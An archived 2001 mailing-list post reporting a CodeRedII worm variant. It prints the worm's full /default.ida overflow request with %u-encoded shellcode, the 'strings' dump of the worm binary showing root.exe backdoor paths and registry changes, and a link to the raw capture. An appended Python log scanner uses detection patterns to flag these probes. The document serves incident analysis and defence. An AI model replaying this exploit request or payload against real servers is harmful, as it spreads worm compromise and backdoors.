Hello all, I'm sorry if this is old news: but is there a new variant going around? My logs just started showing entries with the signature /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX... instead of the /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN... that we've been used to. I know there is a CRv2, but I cannot find any references to a different signature.

I've captured the entire request, and though the % code is all the same, the payload is different. This is the "strings" output on the binary:

----------------------------------------------------------------------
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379

CodeRedII
F4)E
Th~f
Th~f
;MZu
KERNu
EL32u
GetPu
rocAu
D$$dg
LoadLibraryA
CreateThread
GetTickCount
Sleep
GetSystemDefaultLangID
GetSystemDirectoryA
CopyFileA
GlobalFindAtomA
GlobalAddAtomA
CloseHandle
_lcreat
_lwrite
_lclose
GetSystemTime
WS2_32.DLL
socket
closesocket
ioctlsocket
connect
select
send
recv
gethostname
gethostbyname
WSAGetLastError
USER32.DLL
ExitWindowsEx
\CMD.EXE
d:\inetpub\scripts\root.exe
d:\progra~1\common~1\system\MSADC\root.exe
hT @
hH @
hX @
t6Ff
%`0@
%d0@
%h0@
%p0@
%t0@
%x0@
%|0@
\EXPLORER.EXE
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable
SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots
/Scripts
/MSADC
c:\,,217
d:\,,217
KERNEL32.dll
ADVAPI32.dll
Sleep
GetWindowsDirectoryA
WinExec
RegQueryValueExA
RegSetValueExA
RegOpenKeyExA
RegCloseKey
d:\explorer.exe
8>u'j
----------------------------------------------------------------------

The 3818 byte capture file is on my web server if anybody wants to poke around:
http://www.unixwiz.net/misc/codered.bin

Thanks to dwmorris at DSLReports.com for the heads up on this.

Steve

---
Stephen J Friedl | Software Consultant | Tustin, CA | +1 714 544-6561
www.unixwiz.net | I speak for me only | KA8CMY | steveat_private

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
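A small log-scanning example to go with the post above (added here; it is not the poster's code and not part of the original message). It tells the two /default.ida probe shapes apart the way the post does: a long run of N filler bytes followed by the %u-encoded query is labelled as the familiar Code Red signature, and the same request with X filler is labelled as the CodeRedII variant whose payload carries that string. The %u sequence is copied from the captured request above; the log lines, client addresses and timestamps are constructed for the example, and the scanner assumes either Apache-style combined lines or IIS W3C lines where the query is a separate field.

```python
"""Flag Code Red / CodeRedII .ida probes in web server access logs."""
import re
from collections import Counter
from typing import Iterable, List, Optional, Tuple

# A long run of a single filler byte in the .ida query followed by %uXXXX-encoded
# bytes. "[?\s]" after the stem accepts both "GET /default.ida?XXX..." (Apache
# combined format) and "GET /default.ida XXX..." (IIS W3C format, query in its
# own field).
_IDA_PROBE = re.compile(
    r'/default\.ida[?\s]'
    r'(?P<filler>[NX])(?P=filler){50,}'       # run of one filler byte (N or X)
    r'[^\s"]*?'
    r'(?P<enc>(?:%u[0-9a-fA-F]{4}){3,})',     # %u-encoded payload bytes
    re.IGNORECASE,
)

# Labels follow the distinction drawn in the post: N runs are the signature
# "we've been used to", X runs are the variant whose binary contains "CodeRedII".
_LABELS = {"N": "CodeRed (N filler)", "X": "CodeRedII (X filler)"}

_CLIENT_IP = re.compile(r'(\d{1,3}(?:\.\d{1,3}){3})')


def classify_request(line: str) -> Optional[str]:
    """Return a variant label if the line carries an .ida overflow probe, else None."""
    m = _IDA_PROBE.search(line)
    if not m:
        return None
    return _LABELS[m.group("filler").upper()]


def scan_log(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, client_ip, label) for every matching log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        label = classify_request(line)
        if label:
            ip = _CLIENT_IP.search(line)
            hits.append((n, ip.group(1) if ip else "?", label))
    return hits


def summarize(lines: Iterable[str]) -> dict:
    """Count hits per variant label (useful for a quick daily tally)."""
    return dict(Counter(label for _, _, label in scan_log(list(lines))))


# The %u-encoded tail of the request captured in the post above.
SHELLCODE_ENC = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858"
                 "%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff"
                 "%u0078%u0000%u00=a")

# Constructed sample log lines (RFC 5737 documentation addresses, made-up times).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Aug/2001:18:01:02 -0700] "GET /default.ida?'
    + "N" * 224 + SHELLCODE_ENC + ' HTTP/1.0" 200 0',
    '198.51.100.7 - - [04/Aug/2001:18:05:41 -0700] "GET /default.ida?'
    + "X" * 224 + SHELLCODE_ENC + ' HTTP/1.0" 200 0',
    # IIS W3C extended format: uri-stem and uri-query are separate fields
    "2001-08-05 01:10:09 203.0.113.5 GET /default.ida "
    + "X" * 224 + SHELLCODE_ENC + " 200",
    '192.0.2.44 - - [04/Aug/2001:18:07:00 -0700] "GET /index.html HTTP/1.0" 200 1024',
    # short filler run with no %u payload: not the overflow probe, just noise
    '192.0.2.45 - - [04/Aug/2001:18:08:00 -0700] "GET /default.ida?XXXXXXXXXX HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for n, ip, label in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {label}")
    print(summarize(SAMPLE_LOG))
```

The filler-run threshold (50 bytes) and the minimum of three %u groups are deliberately loose so that trimmed or truncated log lines still match; tighten them if a log shows unrelated long-query requests to the .ida handler.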
This archive was generated by hypermail 2b30 : Sat Aug 04 2001 - 19:45:22 PDT